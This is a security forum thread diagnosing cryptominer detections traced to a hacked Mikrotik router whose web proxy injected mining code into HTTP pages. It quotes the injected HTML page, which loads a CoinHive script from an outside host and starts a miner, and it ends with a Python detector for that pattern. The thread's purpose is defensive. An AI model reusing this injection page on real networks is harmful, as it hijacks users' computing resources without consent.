
Hi, 

We have a computer with more than 10.000 detected threats like the one below:

Threat: JS/CoinMiner.AH

Process: C:\Windows\System32\wscript.exe

Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login

Is this a sign that the computer is infected, or is this the result of attempts to infect it?

Note: The address 10.100.1.254 is a Mikrotik router and it is updated with latest updates.

 


In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ELC on that machine and provide me with the generated archive.


You can find the source by creating a HIPS rule to block the startup of C:\Windows\System32\wscript.exe. Also make sure you log the event and set its type to "warning." This shouldn't cause any issues unless you have created any custom .js or .ws scripts.

If the HIPS log shows the source as svchost.exe, this could possibly indicate that a scheduled task is behind the activity. Unfortunately, the HIPS won't show which service is behind the activity.

On 8/31/2018 at 2:39 PM, Marcos said:

In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ESET Log Collector on that machine and provide me with the generated archive.

Here are the collected logs on the affected machine.

Thanks for your help.

ees_logs.zip


I've been able to find the origin of these detections and have already solved the problem.

When I was trying to understand the origin of these trojans, I noticed that some of the addresses were legit and didn't raise any problems outside our client network.

So I started a search for some kind of proxy that could inject malicious code into legit HTTP pages and found out that they had their Mikrotik router hacked to make every request made to port 80 go through the web proxy on port 8080, where the malicious code was injected and later blocked on the client machine.

The hack has been possible because of this vulnerability in Mikrotik RouterOS: https://blog.mikrotik.com/security/winbox-vulnerability.html

I've changed every password, disabled the web proxy and deleted the firewall rule, so now everything is fine.

@itman, @Marcos Thanks for the tips

Edited by MAGIK José Rocha


We appreciate your feedback, José. In other cases with different brands of routers, a factory reset followed by upgrading the firmware didn't help.


Here is the HTML source for the page that runs the miner:

<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
	<title>"$(url)"</title> 
<_script src="https://coinhive.com/lib/coinhive.min.js"></script>
<_script>
	var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2});
	miner.start();
</script>
</head>
<frameset>
<frame src="$(url)"></frame>
</frameset>
</html>

 

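A small check for the injection pattern shown in the post above, written as an added example (not code from the thread or from ESET): it scans an HTTP response body for a script loaded from coinhive.com, an inline script that starts a CoinHive miner, and a frameset whose only frame points back at the URL the client actually requested, which is how the hijacked proxy wrapped the real page. The sample page is constructed from the snippet above with "$(url)" filled in and the site key replaced by a placeholder.

```python
# Added example (not from the thread): flag an HTTP response body showing the
# traits of the injected page: a <script> pulled from coinhive.com, an inline
# script starting a CoinHive miner, and a <frameset> wrapping the requested URL.
from html.parser import HTMLParser
from urllib.parse import urlparse

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.script_hosts, self.frame_srcs, self.inline = [], [], ""
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_hosts.append(urlparse(a["src"]).hostname or "")
        elif tag == "frame" and a.get("src"):
            self.frame_srcs.append(a["src"])

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script:
            self.inline += data

def detect_injected_miner(body, requested_url):
    """Return the list of injection traits found; empty means none seen."""
    s = _Scanner()
    s.feed(body)
    found = []
    if any(h == "coinhive.com" or h.endswith(".coinhive.com") for h in s.script_hosts):
        found.append("external script from coinhive.com")
    if "CoinHive.Anonymous(" in s.inline and "miner.start" in s.inline:
        found.append("inline script starts a CoinHive miner")
    if s.frame_srcs == [requested_url]:  # proxy wrapped the real page in a frame
        found.append("frameset wrapping the requested URL")
    return found

# Constructed sample: the thread's page with "$(url)" filled in and the site key
# replaced by a placeholder; CLEAN is an ordinary page for comparison.
URL = "http://example.com/"
INJECTED = f"""<html><head><title>"{URL}"</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER', {{throttle: 0.2}});
miner.start();</script></head>
<frameset><frame src="{URL}"></frame></frameset></html>"""
CLEAN = "<html><head><title>Example</title></head><body><p>hello</p></body></html>"
```

Running `detect_injected_miner(INJECTED, URL)` returns all three findings, while `CLEAN` returns an empty list; comparing responses fetched over port 80 from inside and outside the network is the quickest way to confirm an interception like this.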
20 minutes ago, MAGIK José Rocha said:

Here is the HTML source for the page that runs the miner:

Yes. That is exactly what triggers the detection, and a screenshot of this was also included in the write-up mentioned above.

